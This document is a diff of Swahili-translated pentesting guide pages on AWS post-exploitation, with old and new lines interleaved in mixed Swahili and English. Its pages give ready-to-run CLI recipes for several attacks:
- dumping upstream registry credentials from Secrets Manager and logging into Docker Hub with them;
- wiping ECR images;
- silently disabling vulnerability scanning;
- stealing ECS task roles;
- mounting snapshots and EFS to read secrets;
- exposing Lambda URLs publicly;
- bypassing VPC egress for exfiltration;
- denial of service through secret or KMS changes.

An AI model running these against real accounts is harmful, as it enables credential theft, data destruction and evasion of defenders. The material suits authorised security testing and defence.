Mshambuliaji mwenye moja ya ruhusa hizi anaweza **kuunda au kubadilisha lifecycle policy ili kufuta images zote kwenye repository** na kisha **kufuta ECR repository nzima**. Hii itasababisha kupoteza images zote za container zilizohifadhiwa kwenye repository.
Mshambuliaji mwenye ruhusa yoyote ya hizi anaweza **kuunda au kubadilisha lifecycle policy ili kufuta images zote katika repository** na kisha **kufuta ECR repository nzima**. Hii itasababisha kupoteza images zote za container zilizohifadhiwa katika repository.
```bash
# Create a JSON file with the malicious lifecycle policy
echo '{
@@ -90,23 +90,21 @@ aws ecr batch-delete-image --repository-name your-ecr-repo-name --image-ids imag
# Delete multiple images from the ECR public repository
aws ecr-public batch-delete-image --repository-name your-ecr-repo-name --image-ids imageTag=latest imageTag=v1.0.0
```
{{#include ../../../../banners/hacktricks-training.md}}
### Exfiltrate nywila za registri za upstream kutoka ECR PullThrough Cache (PTC)
### Exfiltrate upstream registry credentials from ECR PullThrough Cache (PTC)
Ikiwa ECR PullThrough Cache imewekwa kwa registri za upstream zenye uthibitishaji (Docker Hub, GHCR, ACR, nk), cheti za kuingia za upstream huhifadhiwa katika AWS Secrets Manager kwa kiambishi jina kinachotabirika: `ecr-pullthroughcache/`. Waendeshaji wakati mwingine huwapa ECR admins ruhusa kubwa za kusoma Secrets Manager, kuwezesha credential exfiltration na matumizi tena nje ya AWS.
Ikiwa ECR PullThrough Cache imewekwa kwa registries za upstream zilizo na uthibitishaji (Docker Hub, GHCR, ACR, etc.), nywila za upstream zinahifadhiwa katika AWS Secrets Manager kwa kiandishi cha jina kinachotabirika: `ecr-pullthroughcache/`. Waendeshaji mara kwa mara huwapa ECR admins ruhusa kubwa ya kusoma Secrets Manager, ikiruhusu credential exfiltration na matumizi tena nje ya AWS.
Mahitaji
- secretsmanager:ListSecrets
- secretsmanager:GetSecretValue
Orodhesha siri za PTC zinazowezekana
Orodhesha siri za PTC zinazoweza kuwa mgombea
```bash
aws secretsmanager list-secrets \
--query "SecretList[?starts_with(Name, 'ecr-pullthroughcache/')].Name" \
--output text
```
Toa secrets zilizogunduliwa na kuchambua sehemu za kawaida
Dump secrets zilizogunduliwa na chambua mashamba ya kawaida
```bash
for s in $(aws secretsmanager list-secrets \
--query "SecretList[?starts_with(Name, 'ecr-pullthroughcache/')].ARN" --output text); do
@@ -120,21 +118,21 @@ Hiari: thibitisha leaked creds dhidi ya upstream (readonly login)
```bash
echo "$DOCKERHUB_PASSWORD" | docker login --username "$DOCKERHUB_USERNAME" --password-stdin registry-1.docker.io
```
Athari
- Kusoma ingizo hizi za Secrets Manager kunatoa kredensiali za registry za upstream zinazoweza kutumika tena (username/password au token), ambazo zinaweza kutumiwa kwa ubaya nje ya AWS kuvuta private images au kupata repositories za ziada kulingana na ruhusa za upstream.
Impact
- Kusoma entry hizi za Secrets Manager kunatoa reusable upstream registry credentials (username/password or token), ambazo zinaweza kutumiwa vibaya nje ya AWS kuvuta private images au kupata repositories za ziada kulingana na upstream permissions.
### Ujanja wa ngazi ya registry: zima au punguza ukaguzi kupitia `ecr:PutRegistryScanningConfiguration`
### Registry-level stealth: disable or downgrade scanning via `ecr:PutRegistryScanningConfiguration`
Mshambulizi mwenye ruhusa za ECR za ngazi ya registry anaweza kimya kimya kupunguza au kuzima ukaguzi wa kiotomatiki wa udhaifu kwa repositories ZOTE kwa kuweka registry scanning configuration kuwa BASIC bila sheria za scan-on-push. Hii inazuia pushes mpya za image kuangaliwa kiotomatiki, ikificha images zilizo hatarishi au zenye madhara.
Mshambuliaji mwenye ruhusa za ngazi ya registry za ECR anaweza kimya kimya kupunguza au kuzima automatic vulnerability scanning kwa repositories zote (ALL) kwa kuweka registry scanning configuration kuwa BASIC bila sheria za scan-on-push. Hii inazuia new image pushes kutochunguzwa kwa njia ya otomatiki, ikificha vulnerable au malicious images.
Mahitaji
Requirements
- ecr:PutRegistryScanningConfiguration
- ecr:GetRegistryScanningConfiguration
- ecr:PutImageScanningConfiguration (optional, perrepo)
- ecr:DescribeImages, ecr:DescribeImageScanFindings (verification)
Kupungua kwa kiwango kwa registry nzima kwenda kwa manual (hakuna skana za kiotomatiki)
Registry-wide downgrade to manual (no auto scans)
```bash
REGION=us-east-1
# Read current config (save to restore later)
@@ -161,7 +159,7 @@ aws ecr describe-images --region "$REGION" --repository-name "$repo" --image-ids
# Optional: will error with ScanNotFoundException if no scan exists
aws ecr describe-image-scan-findings --region "$REGION" --repository-name "$repo" --image-id imageTag=test || true
```
Hiari: kupunguza zaidi katika wigo wa repo
Hiari: dhoofisha zaidi katika wigo la repo
```bash
# Disable scan-on-push for a specific repository
aws ecr put-image-scanning-configuration \
@@ -170,19 +168,19 @@ aws ecr put-image-scanning-configuration \
--image-scanning-configuration scanOnPush=false
```
Athari
- New image pushes across the registry are not scanned automatically, reducing visibility of vulnerable or malicious content and delaying detection until a manual scan is initiated.
- Push mpya za image katika registry hazifanyi scan kiotomatiki, hupunguza mwonekano wa maudhui yaliyo hatarishi au ya maliciozi na kuchelewesha utambuzi hadi scan ya mwongozo itakapofanywa.
### Registrywide scanning engine downgrade via `ecr:PutAccountSetting` (AWS_NATIVE -> CLAIR)
### Kupunguza ubora wa scanning engine ya registry nzima kupitia `ecr:PutAccountSetting` (AWS_NATIVE -> CLAIR)
Reduce vulnerability detection quality across the entire registry by switching the BASIC scan engine from the default AWS_NATIVE to the legacy CLAIR engine. This doesnt disable scanning but can materially change findings/coverage. Combine with a BASIC registry scanning configuration with no rules to make scans manual-only.
Punguza ubora wa utambuzi wa vulnerabilities katika registry yote kwa kubadilisha BASIC scan engine kutoka default AWS_NATIVE kwenda engine ya legacy CLAIR. Hii haitoi disabled scanning lakini inaweza kubadilisha kwa kiasi matokeo/coverage. Imeunganishwa na configuration ya BASIC registry scanning bila rules ili kufanya scans ziwe za mwongozo pekee.
Mahitaji
- `ecr:PutAccountSetting`, `ecr:GetAccountSetting`
- (Hiari) `ecr:PutRegistryScanningConfiguration`, `ecr:GetRegistryScanningConfiguration`
- (Optional) `ecr:PutRegistryScanningConfiguration`, `ecr:GetRegistryScanningConfiguration`
Athari
- Registry setting `BASIC_SCAN_TYPE_VERSION` set to `CLAIR` so subsequent BASIC scans run with the downgraded engine. CloudTrail records the `PutAccountSetting` API call.
- Registry setting `BASIC_SCAN_TYPE_VERSION` set to `CLAIR` hivyo BASIC scans zinazofuata zinaendesha na engine iliyopunguzwa. CloudTrail inarekodi API call ya `PutAccountSetting`.
Hatua
```bash
@@ -203,4 +201,4 @@ aws ecr put-registry-scanning-configuration --region $REGION --scan-type BASIC -
# 5) Restore to AWS_NATIVE when finished to avoid side effects
aws ecr put-account-setting --region $REGION --name BASIC_SCAN_TYPE_VERSION --value AWS_NATIVE
```
{{#include ../../../../banners/hacktricks-training.md}}

48
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-ecs-post-exploitation/README.md
View File

@@ -4,7 +4,7 @@
## ECS
For more information check:
Kwa taarifa zaidi angalia:
{{#ref}}
../../aws-services/aws-ecs-enum.md
@@ -12,33 +12,33 @@ For more information check:
### Host IAM Roles
Katika ECS, **IAM role can be assigned to the task** inayotekelezwa ndani ya container. **If** the task inateketezwa ndani ya **EC2** instance, the **EC2 instance** itakuwa na **another IAM** role imeambatanishwa nayo.\
Which means that if you manage to **compromise** an ECS instance you can potentially **obtain the IAM role associated to the ECR and to the EC2 instance**. For more info about how to get those credentials check:
Katika ECS, **IAM role can be assigned to the task** inayokimbia ndani ya container. **If** task inakimbia ndani ya **EC2** instance, **EC2 instance** itakuwa na **another IAM** role attached to it.\
Hii inamaanisha kwamba ikiwa utafanikiwa **compromise** ECS instance unaweza kwa uwezekano **obtain the IAM role associated to the ECR and to the EC2 instance**. Kwa habari zaidi kuhusu jinsi ya kupata those credentials angalia:
{{#ref}}
https://book.hacktricks.wiki/en/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.html
{{#endref}}
> [!CAUTION]
> Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance.
> Kumbuka kwamba ikiwa EC2 instance inatekeleza IMDSv2, [**kama inavyoelezwa kwenye docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), **response of the PUT request** itakuwa na **hop limit of 1**, na hivyo isiwezekane kufikia EC2 metadata kutoka container ndani ya EC2 instance.
### Privesc to node to steal other containers creds & secrets
But moreover, EC2 uses docker to run ECs tasks, so if you can escape to the node or **access the docker socket**, you can **check** which **other containers** are being run, and even **get inside of them** and **steal their IAM roles** attached.
Zaidi ya hayo, EC2 inatumia docker kuendesha ECS tasks, hivyo kama utaweza kutoroka hadi node au **access the docker socket**, unaweza **check** ni **other containers** zipi zinaendeshwa, na hata **get inside of them** na **steal their IAM roles** attached.
#### Making containers run in current host
Zaidi ya hayo, the **EC2 instance role** kwa kawaida itakuwa na vya kutosha **permissions** za **update the container instance state** za EC2 instances zinazotumika kama nodes ndani ya cluster. Mshambuliaji anaweza kubadilisha **state of an instance to DRAINING**, then ECS itafanya **remove all the tasks from it** na zile zinazotekelezwa kama **REPLICA** zitatumikishwa kwenye **instance tofauti**, kwa uwezekano ndani ya **attackers instance** ili aweze **steal their IAM roles** na taarifa nyeti zinazoweza kuwepo ndani ya container.
Zaidi ya hayo, **EC2 instance role** kawaida huwa na vya kutosha **permissions** za **update the container instance state** za EC2 instances zinazotumika kama nodes ndani ya cluster. Mshambuliaji anaweza kubadilisha **state of an instance to DRAINING**, kisha ECS ita **remove all the tasks from it** na zile zinazoendeshwa kama **REPLICA** zita **run in a different instance,** huenda ndani ya **attackers instance**, hivyo anaweza **steal their IAM roles** na taarifa nyeti zinazoweza kuwepo ndani ya container.
```bash
aws ecs update-container-instances-state \
--cluster <cluster> --status DRAINING --container-instances <container-instance-id>
```
Mbinu ile ile inaweza kufanywa kwa **kufuta usajili wa EC2 instance kutoka kwenye cluster**. Hii inaweza kuwa si ya kimya zaidi lakini ita **kulazimisha tasks ziendeshwe katika instances nyingine:**
Mbinu ile ile inaweza kufanywa kwa **deregistering the EC2 instance from the cluster**. Inaweza kuwa si ya siri zaidi lakini italazimisha **majukumu yatekelezwe kwenye instances nyingine:**
```bash
aws ecs deregister-container-instance \
--cluster <cluster> --container-instance <container-instance-id> --force
```
Mbinu ya mwisho ya kulazimisha utekelezaji upya wa tasks ni kwa kuonyesha ECS kwamba **task au container ilisimamishwa**. Kuna APIs 3 zinazowezekana za kufanya hivyo:
Mbinu ya mwisho ya kulazimisha utekelezaji upya wa tasks ni kwa kumfahamisha ECS kwamba **task or container was stopped**. Kuna 3 APIs zinazowezekana za kufanya hili:
```bash
# Needs: ecs:SubmitTaskStateChange
aws ecs submit-task-state-change --cluster <value> \
@@ -50,38 +50,36 @@ aws ecs submit-container-state-change ...
# Needs: ecs:SubmitAttachmentStateChanges
aws ecs submit-attachment-state-changes ...
```
### Kunyang'anya taarifa nyeti kutoka kwa ECR containers
### Kuiba taarifa nyeti kutoka kwa ECR containers
Instance ya EC2 kwa kawaida itaweza pia kuwa na ruhusa `ecr:GetAuthorizationToken` inayomruhusu **kupakua images** (unaweza kutafuta ndani yao taarifa nyeti).
{{#include ../../../../banners/hacktricks-training.md}}
The EC2 instance huenda pia ina ruhusa `ecr:GetAuthorizationToken` inayoruhusu **kupakua images** (unaweza kutafuta taarifa nyeti ndani yao).
### Pakia snapshot ya EBS moja kwa moja ndani ya ECS task (configuredAtLaunch + volumeConfigurations)
### Unganisha snapshot ya EBS moja kwa moja ndani ya ECS task (configuredAtLaunch + volumeConfigurations)
Tumia vibaya muunganisho wa asili wa ECS EBS (2024+) kupakia yaliyomo ya snapshot ya EBS iliyopo moja kwa moja ndani ya ECS task/service mpya na kusoma data yake kutoka ndani ya container.
Tumia vibaya muunganisho wa asili wa ECS EBS (2024+) kuunganisha yaliyomo ya snapshot ya EBS iliyopo moja kwa moja ndani ya ECS task/service mpya na kusoma data yake kutoka ndani ya container.
- Inahitaji (kwa chini):
- Inahitajika (chini kabisa):
- ecs:RegisterTaskDefinition
- Moja ya: ecs:RunTask AU ecs:CreateService/ecs:UpdateService
- iam:PassRole kwa:
- Mojawapo ya: ecs:RunTask OR ecs:CreateService/ecs:UpdateService
- iam:PassRole kwenye:
- ECS infrastructure role inayotumika kwa volumes (policy: `service-role/AmazonECSInfrastructureRolePolicyForVolumes`)
- Task execution/Task roles zinazotajwa na task definition
- Ikiwa snapshot imefichwa kwa CMK: ruhusa za KMS kwa infra role (managed policy ya AWS iliyo hapo juu inajumuisha KMS grants zinazohitajika kwa AWS managed keys).
- Task execution/Task roles zinazorejelewa na task definition
- Ikiwa snapshot imefumwa kwa CMK: ruhusa za KMS kwa infra role (the AWS managed policy above includes the required KMS grants for AWS managed keys).
- Athari: Soma yaliyomo yoyote kwenye diski kutoka snapshot (mfano, faili za database) ndani ya container na kuyapeleka nje kupitia mtandao/logs.
- Athari: Soma yaliyomo yoyote ya diski kutoka snapshot (kwa mfano, faili za database) ndani ya container na kusafirisha nje kupitia mtandao/maandishi ya kumbukumbu (network/logs).
Hatua (mfano wa Fargate):
Steps (Fargate example):
1) Unda ECS infrastructure role (ikiwa haipo) na uambatanishe managed policy:
1) Unda ECS infrastructure role (ikiwa haipo) na uambatisha managed policy:
```bash
aws iam create-role --role-name ecsInfrastructureRole \
--assume-role-policy-document '{"Version":"2012-10-17","Statement":[{"Effect":"Allow","Principal":{"Service":"ecs.amazonaws.com"},"Action":"sts:AssumeRole"}]}'
aws iam attach-role-policy --role-name ecsInfrastructureRole \
--policy-arn arn:aws:iam::aws:policy/service-role/AmazonECSInfrastructureRolePolicyForVolumes
```
2) Sajili task definition yenye volume iliyotajwa kama `configuredAtLaunch` na ui-mount kwenye container. Mfano (inachapisha siri kisha inalala):
2) Sajili task definition na volume iliyoelezwa `configuredAtLaunch` na ui-mount katika container. Mfano (prints the secret then sleeps):
```json
{
"family": "ht-ebs-read",
@@ -115,7 +113,7 @@ aws iam attach-role-policy --role-name ecsInfrastructureRole \
]
}
```
4) Wakati task inapoanza, container inaweza kusoma yaliyomo ya snapshot kwenye njia ya mount iliyosanidiwa (mfano, `/loot`). Exfiltrate via the tasks network/logs.
4) Wakati task inapoanza, container inaweza kusoma yaliyomo ya snapshot kwenye mount path iliyosanifiwa (kwa mfano, `/loot`). Exfiltrate kupitia network/logs za task.
Usafishaji:
```bash
@@ -123,4 +121,4 @@ aws ecs update-service --cluster ht-ecs-ebs --service ht-ebs-svc --desired-count
aws ecs delete-service --cluster ht-ecs-ebs --service ht-ebs-svc --force
aws ecs deregister-task-definition ht-ebs-read
```
{{#include ../../../../banners/hacktricks-training.md}}

33
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-efs-mount-injection.md
View File

@@ -1,27 +1,29 @@
# AWS Lambda EFS Mount Injection via UpdateFunctionConfiguration (Data Theft)
# AWS Lambda EFS Mount Injection via UpdateFunctionConfiguration (Uibi wa Data)
Tumia `lambda:UpdateFunctionConfiguration` kuambatanisha EFS Access Point iliyopo kwenye Lambda, kisha wekeza code rahisi inayoorodhesha/inasoma mafaili kutoka kwenye path iliyopangwa ili kutoa sirimu/shughuli za config zilizoshirikiwa ambazo function haikuweza kufikia hapo awali.
{{#include ../../../../banners/hacktricks-training.md}}
Tumia vibaya `lambda:UpdateFunctionConfiguration` kuambatanisha EFS Access Point iliyopo kwenye Lambda, kisha weka code rahisi inayoorodhesha/inasoma files kutoka kwenye path iliyopachikwa ili exfiltrate shared secrets/config ambayo function haikuweza kufikia kabla.
## Requirements
- Ruhusa kwenye akaunti/mwenye mamlaka ya mwathirika:
- Permissions on the victim account/principal:
- `lambda:GetFunctionConfiguration`
- `lambda:ListFunctions` (kwa kutafuta functions)
- `lambda:ListFunctions` (to find functions)
- `lambda:UpdateFunctionConfiguration`
- `lambda:UpdateFunctionCode`
- `lambda:InvokeFunction`
- `efs:DescribeMountTargets` (kwenye kuthibitisha mount targets zipo)
- Misingi ya mazingira:
- Lambda lengwa iko VPC-enabled na subnets/SGs zake zinaweza kufikia EFS mount target SG kupitia TCP/2049 (mfano: role ina AWSLambdaVPCAccessExecutionRole na routing ya VPC inaruhusu).
- EFS Access Point iko katika VPC ileile na ina mount targets katika AZs za subnets za Lambda.
- `efs:DescribeMountTargets` (to confirm mount targets exist)
- Environment assumptions:
- Target Lambda is VPC-enabled and its subnets/SGs can reach the EFS mount target SG over TCP/2049 (e.g. role has AWSLambdaVPCAccessExecutionRole and VPC routing allows it).
- The EFS Access Point is in the same VPC and has mount targets in the AZs of the Lambda subnets.
## Attack
- Vigezo
- Variables
```
REGION=us-east-1
TARGET_FN=<target-lambda-name>
EFS_AP_ARN=<efs-access-point-arn>
```
1) Ambatisha EFS Access Point kwenye Lambda
1) Ambatanisha EFS Access Point kwa Lambda
```
aws lambda update-function-configuration \
--function-name $TARGET_FN \
@@ -30,7 +32,7 @@ aws lambda update-function-configuration \
# wait until LastUpdateStatus == Successful
until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done
```
2) Andika upya code na msomaji rahisi unaoorodhesha faili na kutazama baiti 200 za kwanza za faili inayoweza kuwa siri/config
2) Andika upya code kwa kisomaji rahisi kinachoorodhesha faili na kuangalia (peek) bytes 200 za mwanzo za faili inayoweza kuwa secret/config.
```
cat > reader.py <<PY
import os, json
@@ -57,19 +59,18 @@ aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://re
aws lambda update-function-configuration --function-name $TARGET_FN --handler reader.lambda_handler --region $REGION
until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done
```
3) Waita na upate data
3) Iitisha na upate data
```
aws lambda invoke --function-name $TARGET_FN /tmp/efs-out.json --region $REGION >/dev/null
cat /tmp/efs-out.json
```
Matokeo yanapaswa kujumuisha orodha ya directory chini ya /mnt/ht na onyesho fupi la faili ya secret/config iliyochaguliwa kutoka EFS.
Matokeo yanapaswa kujumuisha orodha ya saraka chini ya /mnt/ht na onyesho fupi la faili ya siri/usanidi iliyochaguliwa kutoka EFS.
## Athari
Mtuhumiwa (attacker) aliye na permissions zilizoorodheshwa anaweza mount arbitrary in-VPC EFS Access Points ndani ya victim Lambda functions ili kusoma na exfiltrate shared configuration na secrets zilizohifadhiwa kwenye EFS ambazo hapo awali zilikuwa inaccessible kwa function hiyo.
Mshambuliaji mwenye ruhusa zilizoorodheshwa anaweza ku-mount EFS Access Points yoyote ndani ya in-VPC katika Lambda functions za mwathiriwa ili kusoma na kupeleka nje usanidi uliohifadhiwa pamoja na siri kwenye EFS ambazo hapo awali zilikuwa hazipatikani kwa function hiyo.
## Usafishaji
```
aws lambda update-function-configuration --function-name $TARGET_FN --file-system-configs [] --region $REGION || true
```
{{#include ../../../../banners/hacktricks-training.md}}

26
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-function-url-public-exposure.md
View File

@@ -1,14 +1,16 @@
# AWS - Lambda Function URL Public Exposure (AuthType NONE + Public Invoke Policy)
# AWS - Lambda Function URL Kufichuliwa kwa Umma (AuthType NONE + Public Invoke Policy)
Geuza Lambda Function URL ya kibinafsi kuwa endpoint ya umma isiyohitaji uthibitisho kwa kubadili Function URL AuthType kuwa NONE na kuambatisha resource-based policy inayoruhusu lambda:InvokeFunctionUrl kwa kila mtu. Hii inawawezesha watu kuita kwa anonymous internal functions na inaweza kufichua operesheni za nyuma (backend) zenye taarifa nyeti.
{{#include ../../../../banners/hacktricks-training.md}}
## Abusing it
Badilisha Lambda Function URL ya kibinafsi kuwa endpoint ya umma isiyothibitishwa kwa kubadilisha Function URL AuthType kuwa NONE na kuambatanisha sera ya msingi wa rasilimali inayompa lambda:InvokeFunctionUrl kila mtu. Hii inawezesha uitumaji bila kujulikana wa function za ndani na inaweza kufichua operesheni za backend zenye siri.
- Pre-reqs: lambda:UpdateFunctionUrlConfig, lambda:CreateFunctionUrlConfig, lambda:AddPermission
## Kutumia vibaya
- Vigezo vinavyotakiwa: lambda:UpdateFunctionUrlConfig, lambda:CreateFunctionUrlConfig, lambda:AddPermission
- Mkoa: us-east-1
### Steps
1) Hakikisha Lambda function ina Function URL (defaults to AWS_IAM):
### Hatua
1) Hakikisha funksheni ina Function URL (kwa kawaida ni AWS_IAM):
```
aws lambda create-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true
```
@@ -18,21 +20,21 @@ aws lambda create-function-url-config --function-name $TARGET_FN --auth-type AWS
aws lambda update-function-url-config --function-name $TARGET_FN --auth-type NONE
```
3) Ongeza resource-based policy statement ili kuruhusu principals zisizo na uthibitisho:
3) Ongeza tamko la sera la msingi wa rasilimali ili kuruhusu wadau wasiothibitishwa:
```
aws lambda add-permission --function-name $TARGET_FN --statement-id ht-public-url --action lambda:InvokeFunctionUrl --principal "*" --function-url-auth-type NONE
```
4) Pata URL na uitumie bila kredensiali:
4) Pata URL na uitumie bila cheti za uthibitisho:
```
URL=$(aws lambda get-function-url-config --function-name $TARGET_FN --query FunctionUrl --output text)
curl -sS "$URL"
```
### Impact
- Lambda function inakuwa inapatikana bila uthibitisho kupitia intaneti.
### Athari
- Funksheni ya Lambda inakuwa inaweza kufikiwa mtu yeyote mtandaoni bila uthibitisho.
### Example output (unauthenticated 200)
### Mfano wa pato (200 bila uthibitisho)
```
HTTP 200
https://e3d4wrnzem45bhdq2mfm3qgde40rjjfc.lambda-url.us-east-1.on.aws/
@@ -43,4 +45,4 @@ https://e3d4wrnzem45bhdq2mfm3qgde40rjjfc.lambda-url.us-east-1.on.aws/
aws lambda remove-permission --function-name $TARGET_FN --statement-id ht-public-url || true
aws lambda update-function-url-config --function-name $TARGET_FN --auth-type AWS_IAM || true
```
{{#include ../../../../banners/hacktricks-training.md}}

14
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-runtime-pinning-abuse.md
View File

@@ -1,12 +1,16 @@
# AWS Lambda Runtime Pinning/Rollback Abuse via PutRuntimeManagementConfig
Tumia vibaya `lambda:PutRuntimeManagementConfig` kuipin (pin) function kwa toleo maalum la runtime (Manual) au kuzuia masasisho (FunctionUpdate). Hii inahifadhi ulinganifu na layers/wrappers zenye madhara na inaweza kuweka function kwenye runtime ya zamani yenye udhaifu ili kusaidia exploitation na kudumu kwa muda mrefu.
{{#include ../../../../banners/hacktricks-training.md}}
Abuse `lambda:PutRuntimeManagementConfig` to pin a function to a specific runtime version (Manual) or freeze updates (FunctionUpdate). Hii inahifadhi ulinganifu na layers/wrappers zenye madhumuni mabaya na inaweza kuiacha function kwenye runtime iliyokuwa ya zamani na yenye udhaifu ili kusaidia exploitation na long-term persistence.
Mahitaji: `lambda:InvokeFunction`, `logs:FilterLogEvents`, `lambda:PutRuntimeManagementConfig`, `lambda:GetRuntimeManagementConfig`.
Mfano (us-east-1):
- Endesha: `aws lambda invoke --function-name /tmp/ping.json --payload {} --region us-east-1 > /dev/null; sleep 5`
- Zuia masasisho: `aws lambda put-runtime-management-config --function-name --update-runtime-on FunctionUpdate --region us-east-1`
- Thibitisha: `aws lambda get-runtime-management-config --function-name --region us-east-1`
- Invoke: `aws lambda invoke --function-name /tmp/ping.json --payload {} --region us-east-1 > /dev/null; sleep 5`
- Freeze updates: `aws lambda put-runtime-management-config --function-name --update-runtime-on FunctionUpdate --region us-east-1`
- Verify: `aws lambda get-runtime-management-config --function-name --region us-east-1`
Hiari, weka pin kwa toleo maalum la runtime kwa kutoa Runtime Version ARN kutoka kwenye INIT_START logs na kutumia `--update-runtime-on Manual --runtime-version-arn <arn>`.
Kwa hiari weka pin kwenye toleo maalum la runtime kwa kutoa Runtime Version ARN kutoka kwa INIT_START logs na kutumia `--update-runtime-on Manual --runtime-version-arn <arn>`.
{{#include ../../../../banners/hacktricks-training.md}}

19
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-lambda-post-exploitation/aws-lambda-vpc-egress-bypass.md
View File

@@ -1,6 +1,8 @@
# AWS Lambda VPC Egress Bypass by Detaching VpcConfig
Force a Lambda function out of a restricted VPC by updating its configuration with an empty VpcConfig (SubnetIds=[], SecurityGroupIds=[]). The function will then run in the Lambda-managed networking plane, regaining outbound internet access and bypassing egress controls enforced by private VPC subnets without NAT.
{{#include ../../../../banners/hacktricks-training.md}}
Lazimishe function ya Lambda kutoka VPC iliyozuiliwa kwa kusasisha configuration yake na VpcConfig tupu (SubnetIds=[], SecurityGroupIds=[]). Function hiyo itaendeshwa kisha katika Lambda-managed networking plane, ikirejesha upatikanaji wa outbound internet na kupitisha udhibiti wa egress unaotekelezwa na subnet za VPC za kibinafsi bila NAT.
## Abusing it
@@ -10,7 +12,7 @@ Force a Lambda function out of a restricted VPC by updating its configuration wi
### Steps
0) Prepare a minimal handler that proves outbound HTTP works
0) Andaa handler duni inayoonyesha kuwa outbound HTTP inafanya kazi
cat > net.py <<'PY'
import urllib.request, json
@@ -26,12 +28,12 @@ zip net.zip net.py
aws lambda update-function-code --function-name $TARGET_FN --zip-file fileb://net.zip --region $REGION || true
aws lambda update-function-configuration --function-name $TARGET_FN --handler net.lambda_handler --region $REGION || true
1) Record current VPC config (to restore later if needed)
1) Rekodi configuration ya VPC ya sasa (kwa kurejesha baadaye ikiwa inahitajika)
aws lambda get-function-configuration --function-name $TARGET_FN --query 'VpcConfig' --region $REGION > /tmp/orig-vpc.json
cat /tmp/orig-vpc.json
2) Detach the VPC by setting empty lists
2) Tenganisha VPC kwa kuweka orodha tupu
aws lambda update-function-configuration \
--function-name $TARGET_FN \
@@ -39,7 +41,7 @@ aws lambda update-function-configuration \
--region $REGION
until [ "$(aws lambda get-function-configuration --function-name $TARGET_FN --query LastUpdateStatus --output text --region $REGION)" = "Successful" ]; do sleep 2; done
3) Invoke and verify outbound access
3) Piga invoke na thibitisha upatikanaji wa outbound
aws lambda invoke --function-name $TARGET_FN /tmp/net-out.json --region $REGION >/dev/null
cat /tmp/net-out.json
@@ -52,12 +54,13 @@ aws lambda update-function-configuration --function-name $TARGET_FN --vpc-config
fi
### Impact
- Regains unrestricted outbound internet from the function, enabling data exfiltration or C2 from workloads that were intentionally isolated in private subnets without NAT.
- Inarudisha upatikanaji usiozuiliwa wa outbound internet kutoka function, kuwezesha data exfiltration au C2 kutoka kwa workloads zilizokusudiwa kuwa zilifungiwa katika subnet za kibinafsi bila NAT.
### Example output (after detaching VpcConfig)
{"egress": true, "ip": "34.x.x.x"}
### Cleanup
- If you created any temporary code/handler changes, restore them.
- Optionally restore the original VpcConfig saved in /tmp/orig-vpc.json as shown above.
- Ikiwa uliunda mabadiliko yoyote ya muda ya code/handler, yaurejeshe.
- Hiari rejesha VpcConfig asili iliyohifadhiwa katika /tmp/orig-vpc.json kama ilivyoonyeshwa hapo juu.
{{#include ../../../../banners/hacktricks-training.md}}

59
src/pentesting-cloud/aws-security/aws-post-exploitation/aws-secrets-manager-post-exploitation/README.md
View File

@@ -4,7 +4,7 @@
## Secrets Manager
Kwa maelezo zaidi angalia:
For more information check:
{{#ref}}
../../aws-services/aws-secrets-manager-enum.md
@@ -12,33 +12,33 @@ Kwa maelezo zaidi angalia:
### Soma Secrets
**secrets wenyewe ni taarifa nyeti**, [angalia ukurasa wa privesc](../../aws-privilege-escalation/aws-secrets-manager-privesc/README.md) ili ujifunze jinsi ya kuvisoma.
The **Secrets zenyewe ni taarifa nyeti**, [angalia ukurasa wa privesc](../../aws-privilege-escalation/aws-secrets-manager-privesc/README.md) ili ujifunze jinsi ya kuvisoma.
### DoS Badilisha Thamani ya Secret
### DoS Badilisha Thamani ya secret
Kubadilisha thamani ya secret kunaweza **kusababisha DoS kwa mifumo yote inayotegemea thamani hiyo.**
> [!WARNING]
> Kumbuka kwamba thamani za awali pia zinahifadhiwa, hivyo ni rahisi kurudi kwenye thamani ya awali.
> Kumbuka kwamba thamani za awali pia zinahifadhiwa, kwa hivyo ni rahisi kurudi tu kwenye thamani ya awali.
```bash
# Requires permission secretsmanager:PutSecretValue
aws secretsmanager put-secret-value \
--secret-id MyTestSecret \
--secret-string "{\"user\":\"diegor\",\"password\":\"EXAMPLE-PASSWORD\"}"
```
### DoS Badilisha ufunguo wa KMS
### DoS Change KMS key
Ikiwa mshambuliaji ana ruhusa secretsmanager:UpdateSecret, anaweza kusanidi siri ili itumie KMS key inayomilikiwa na mshambuliaji. Ufunguo huo kwa awali umewekwa kwa njia ambayo yeyote anaweza kuupata na kuutumia, hivyo kusasisha siri kwa ufunguo mpya kunawezekana. Ikiwa ufunguo haukupatikana, siri haingeweza kusasishwa.
Iwapo mshambuliaji ana ruhusa secretsmanager:UpdateSecret, anaweza kusanidi secret itumie KMS key inayomilikiwa na mshambuliaji. Kifunguo hicho kimeanzishwa kwa njia kwamba mtu yeyote anaweza kuifikia na kuitumia, hivyo inawezekana kusasisha secret kwa kutumia key mpya. Ikiwa key haikuwa inapatikana, secret haingeweza kusasishwa.
Baada ya kubadilisha ufunguo wa siri, mshambuliaji anabadilisha usanidi wa ufunguo wake ili wao pekee waweze kuupata. Kwa hivyo, katika matoleo yajayo ya siri, yatakuwa yamefungwa kwa ufunguo mpya, na kwa kuwa hakuna mtu anayeweza kuufikia, uwezo wa kupata siri utapotea.
